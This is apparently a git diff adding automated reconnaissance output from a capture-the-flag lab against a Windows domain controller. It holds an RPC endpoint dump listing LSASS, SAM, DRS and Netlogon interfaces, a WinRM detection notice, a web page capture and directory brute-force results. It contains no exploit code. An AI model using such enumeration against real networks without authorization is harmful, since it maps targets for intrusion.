+Protocol: N/A +Provider: N/A +UUID : 0FF1F646-13BB-400A-AB50-9A78F2B7A85A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 6982A06E-5FE2-46B1-B39C-A2C545BFA069 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 082A3471-31B6-422A-B931-A54401960C62 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : FAE436B0-B864-4A87-9EDA-298547CD82F2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : E53D94CA-7464-4839-B044-09A2FB8B3AE5 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 178D84BE-9291-4994-82C6-3F909ACA5A03 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4DACE966-A243-4450-AE3F-9B7BCB5315B8 v2.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1832BCF6-CAB8-41D4-85D2-C9410764F75A v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C521FACF-09A9-42C5-B155-72388595CBF0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2C7FD9CE-E706-4B40-B412-953107EF9BB0 v0.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 88ABCBC3-34EA-76AE-8215-767520655A23 v0.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 76C217BC-C8B4-4201-A745-373AD9032B1A v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 55E6B932-1979-45D6-90C5-7F6270724112 v1.0 +Bindings: + ncalrpc:[LRPC-baa5dfd3c285fa9f38] + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 857FB1BE-084F-4FB5-B59C-4B2C4BE5F0CF v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : B8CADBAF-E84B-46B9-84F2-6F71C03F9E55 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 20C40295-8DBA-48E6-AEBF-3E78EF3BB144 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2513BCBE-6CD4-4348-855E-7EFB3C336DD3 v1.0 +Bindings: + ncalrpc:[LRPC-56be5249e855b3e1a2] + ncalrpc:[OLE389FDE0EE0F1B1F4D79C4FE9A2C8] + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0D3E2735-CEA0-4ECC-A9E2-41A2D81AED4E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : C605F9FB-F0A3-4E2A-A073-73560F8D9E3E v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 1B37CA91-76B1-4F5E-A3C7-2ABFC61F2BB0 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8BFC3BE1-6DEF-4E2D-AF74-7C47CD0ADE4A v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 2D98A740-581D-41B9-AA0D-A88B9D5CE938 v1.0 +Bindings: + ncalrpc:[LRPC-b02c899b61b7b8f1c9] + ncalrpc:[actkernel] + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 0361AE94-0316-4C6C-8AD8-C594375800E2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 5824833B-3C1A-4AD2-BDFD-C31D19E23ED2 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : BDAA0970-413B-4A3E-9E5D-F6DC9D7E0760 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 3B338D89-6CFA-44B8-847E-531531BC9992 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 8782D3B9-EBBD-4644-A3D8-E8725381919B v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 085B0334-E454-4D91-9B8C-4134F9E793F3 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: N/A +UUID : 4BEC6BB8-B5C2-4B6F-B2C1-5DA5CF92D0D9 v1.0 +Bindings: + ncalrpc:[umpo] + +Protocol: N/A +Provider: sysntfy.dll +UUID : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name +Bindings: + ncalrpc:[LRPC-78c65697da0c3cb9e7] + ncalrpc:[LRPC-5d1d91fbc9832f3673] + ncalrpc:[IUserProfile2] + ncalrpc:[LRPC-7f9f9d7e564fa27a15] + ncalrpc:[senssvc] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[LRPC-2d7a6fcd1e6a5d90b0] + ncalrpc:[OLE59700168EED37EDF88950A0917DC] + +Protocol: N/A +Provider: nsisvc.dll +UUID : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint +Bindings: + ncalrpc:[LRPC-9ec11ee764d799175d] + +Protocol: N/A +Provider: nrpsrv.dll +UUID : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint +Bindings: + ncalrpc:[LRPC-99bbae991f0f6e961a] + +Protocol: N/A +Provider: N/A +UUID : E40F7B57-7A25-4CD3-A135-7F7D3DF9D16B v1.0 Network Connection Broker server endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 880FD55E-43B9-11E0-B1A8-CF4EDFD72085 v1.0 KAPI Service endpoint +Bindings: + ncalrpc:[LRPC-95313533ddc887d499] + ncalrpc:[OLE11E1ADACE4D3F3328245D6CF61B4] + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : 5222821F-D5E2-4885-84F1-5F6185A0EC41 v1.0 Network Connection Broker server endpoint for NCB Reset module +Bindings: + ncalrpc:[LRPC-4f7c4b35ddfa33800c] + ncalrpc:[LRPC-9e83194e1e5674c55f] + +Protocol: N/A +Provider: N/A +UUID : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0 +Bindings: + ncalrpc:[LRPC-7d4055d4f64c73ef42] + ncalrpc:[LRPC-a91e72435259adddfa] + +Protocol: N/A +Provider: dhcpcsvc.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc] + ncalrpc:[dhcpcsvc6] + +Protocol: N/A +Provider: dhcpcsvc6.dll +UUID : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint +Bindings: + ncalrpc:[dhcpcsvc6] + +Protocol: [MS-EVEN6]: EventLog Remoting Protocol +Provider: wevtsvc.dll +UUID : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP +Bindings: + ncacn_ip_tcp:10.129.243.131[49665] + ncacn_np:\\DC[\pipe\eventlog] + ncalrpc:[eventlog] + +Protocol: N/A +Provider: gpsvc.dll +UUID : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface +Bindings: + ncalrpc:[LRPC-1e815b36ff28d761c1] + +Protocol: N/A +Provider: N/A +UUID : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: schedsvc.dll +UUID : 86D35949-83C9-4044-B424-DB363231FD0C v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49666] + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: N/A +UUID : 33D84484-3626-47EE-8C6F-E7E98B113BE1 v2.0 +Bindings: + ncalrpc:[LRPC-3e1dbf52587c9cea33] + ncalrpc:[ubpmtaskhostchannel] + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol +Provider: taskcomp.dll +UUID : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0 +Bindings: + ncacn_np:\\DC[\PIPE\atsvc] + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: schedsvc.dll +UUID : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0 +Bindings: + ncalrpc:[LRPC-a6fa6dc5bb5e22a3a2] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-a3db541015ee3b4092] + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-25295713f276d13d17] + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: MPSSVC.dll +UUID : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs +Bindings: + ncalrpc:[LRPC-61500542b0c0f189c2] + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: BFE.DLL +UUID : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API +Bindings: + ncalrpc:[LRPC-3a5ad18195f7896668] + +Protocol: N/A +Provider: N/A +UUID : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service +Bindings: + ncacn_np:\\DC[\PIPE\wkssvc] + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server +Bindings: + ncalrpc:[LRPC-0a9c64a79e96914cf8] + +Protocol: N/A +Provider: N/A +UUID : C2D1B5DD-FA81-4460-9DD6-E7658B85454B v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : F44E62AF-DAB1-44C2-8013-049A9DE417D6 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : 7AEB6705-3AE6-471A-882D-F39C109EDC12 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : E7F76134-9EF5-4949-A2D6-3368CC0988F3 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : B37F900A-EAE4-4304-A2AB-12BB668C0188 v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : ABFB6CA3-0C5E-4734-9285-0AEE72FE8D1C v1.0 +Bindings: + ncalrpc:[LRPC-eeed9c661ca2875f9a] + ncalrpc:[OLEAC93DB631A747BCA540781AA6BEF] + +Protocol: N/A +Provider: N/A +UUID : C49A5A70-8A7F-4E70-BA16-1E8F1F193EF1 v1.0 Adh APIs +Bindings: + ncalrpc:[OLE5FCB0823110EF79154A84BC1C955] + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : C36BE077-E14B-4FE9-8ABC-E856EF4F048B v1.0 Proxy Manager client server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 2E6035B2-E8F1-41A7-A044-656B439C4C34 v1.0 Proxy Manager provider server endpoint +Bindings: + ncalrpc:[TeredoControl] + ncalrpc:[TeredoDiagnostics] + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: iphlpsvc.dll +UUID : 552D076A-CB29-4E44-8B6A-D15E59E2C0AF v1.0 IP Transition Configuration endpoint +Bindings: + ncalrpc:[LRPC-2b9dd75a050dd32327] + +Protocol: N/A +Provider: N/A +UUID : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli +Bindings: + ncalrpc:[LRPC-0f23b80e8c8e8083c8] + ncalrpc:[OLE6A1CCA02AC4BF8BCCEB70B5744EE] + +Protocol: N/A +Provider: N/A +UUID : 51A227AE-825B-41F2-B4A9-1AC9557A1018 v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 8FB74744-B2FF-4C00-BE0D-9EF9A191FE1B v1.0 Ngc Pop Key Service +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : B25A52BF-E5DD-4F4A-AEA6-8CA7272A0E86 v2.0 KeyIso +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-NRPC]: Netlogon Remote Protocol +Provider: netlogon.dll +UUID : 12345678-1234-ABCD-EF00-01234567CFFB v1.0 +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-RAA]: Remote Authorization API Protocol +Provider: N/A +UUID : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck +Bindings: + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + ncalrpc:[NETLOGON_LRPC] + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote +Provider: lsasrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AB v0.0 +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol +Provider: ntdsai.dll +UUID : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface +Bindings: + ncacn_np:\\DC[\pipe\f646315b4c642943] + ncacn_http:10.129.243.131[49674] + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol +Provider: samsrv.dll +UUID : 12345778-1234-ABCD-EF00-0123456789AC v1.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49673] + ncalrpc:[NTDS_LPC] + ncalrpc:[OLE30FBECD9DCFCCBF8301B42E8A091] + ncacn_ip_tcp:10.129.243.131[49667] + ncalrpc:[samss lpc] + ncalrpc:[SidKey Local End Point] + ncalrpc:[protected_storage] + ncalrpc:[lsasspirpc] + ncalrpc:[lsapolicylookup] + ncalrpc:[LSA_EAS_ENDPOINT] + ncalrpc:[lsacap] + ncalrpc:[LSARPC_ENDPOINT] + ncalrpc:[securityevent] + ncalrpc:[audit] + ncacn_np:\\DC[\pipe\lsass] + +Protocol: N/A +Provider: N/A +UUID : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: srvsvc.dll +UUID : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service +Bindings: + ncalrpc:[LRPC-f4293e3b5b9ae5cb28] + +Protocol: N/A +Provider: sysmain.dll +UUID : B58AA02E-2884-4E97-8176-4EE06D794184 v1.0 +Bindings: + ncalrpc:[LRPC-6ba6be7619ad5499b5] + +Protocol: N/A +Provider: N/A +UUID : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server +Bindings: + ncalrpc:[LRPC-e9c9cb51676dd7958e] + +Protocol: N/A +Provider: IKEEXT.DLL +UUID : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API +Bindings: + ncalrpc:[LRPC-a6cbf0f8554ac2dd0e] + +Protocol: N/A +Provider: N/A +UUID : 650A7E26-EAB8-5533-CE43-9C1DFCE11511 v1.0 Vpn APIs +Bindings: + ncalrpc:[LRPC-78511121f1275f430c] + ncalrpc:[VpnikeRpc] + ncalrpc:[RasmanLrpc] + ncacn_np:\\DC[\PIPE\ROUTER] + +Protocol: [MS-SCMR]: Service Control Manager Remote Protocol +Provider: services.exe +UUID : 367ABB81-9844-35F1-AD32-98F038001003 v2.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49678] + +Protocol: [MS-CMPO]: MSDTC Connection Manager: +Provider: msdtcprx.dll +UUID : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0 +Bindings: + ncalrpc:[LRPC-3bcaafee1590c0de20] + ncalrpc:[OLE17B51056E4D45A611212712C1451] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + ncalrpc:[LRPC-9c5b8ea96b2f264739] + +Protocol: N/A +Provider: N/A +UUID : F3F09FFD-FBCF-4291-944D-70AD6E0E73BB v1.0 +Bindings: + ncalrpc:[LRPC-802031e034c1f025bd] + +Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management +Provider: dns.exe +UUID : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0 +Bindings: + ncacn_ip_tcp:10.129.243.131[49695] + +Protocol: [MS-FRS2]: Distributed File System Replication Protocol +Provider: dfsrmig.exe +UUID : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service +Bindings: + ncacn_ip_tcp:10.129.243.131[49843] + ncalrpc:[OLECF74F747061ABA28294F2BDC6FF0] + +Protocol: N/A +Provider: N/A +UUID : BF4DC912-E52F-4904-8EBE-9317C1BDD497 v1.0 +Bindings: + ncalrpc:[LRPC-92939372b55364a6c8] + ncalrpc:[OLE9D9AB6AB4D22AD38C10DD1548060] + +[*] Received 405 endpoints. + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt new file mode 100644 index 00000000..b917c34d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp5985/tcp_5985_winrm-detection.txt @@ -0,0 +1,2 @@ +WinRM was possibly detected running on tcp port 5985. +Check _manual_commands.txt for manual commands you can run against this service. \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html new file mode 100644 index 00000000..61c8cab1 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_curl.html @@ -0,0 +1,50 @@ +HTTP/1.1 200 OK +Content-Type: text/html +Last-Modified: Fri, 20 Aug 2021 13:39:48 GMT +Accept-Ranges: bytes +ETag: "0eaf6d7c895d71:0" +Server: Microsoft-IIS/10.0 +Date: Sat, 28 Oct 2023 13:05:55 GMT +Content-Length: 1034 + + + + + + Slandovia Energy + + + + + + + +
+ + + + +
+ +

MegaCorp

+

+ Slandovia Energy Grid +

+ +
+ + + + + + +
    + no results +
+
+ + + + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt new file mode 100644 index 00000000..9e57635c --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt @@ -0,0 +1,21 @@ +200 GET 25l 72w 692c http://10.129.243.131/script.js +200 GET 215l 294w 3166c http://10.129.243.131/style.css +200 GET 41l 66w 1034c http://10.129.243.131/ +200 GET 41l 66w 1034c http://10.129.243.131/Index.html +200 GET 8l 168w 1092c http://10.129.243.131/LICENSE.txt +200 GET 1l 14w 116c http://10.129.243.131/Search.php +200 GET 41l 66w 1034c http://10.129.243.131/index.html +200 GET 8l 168w 1092c http://10.129.243.131/license.txt +200 GET 1l 14w 116c http://10.129.243.131/search.php +200 GET 25l 72w 692c 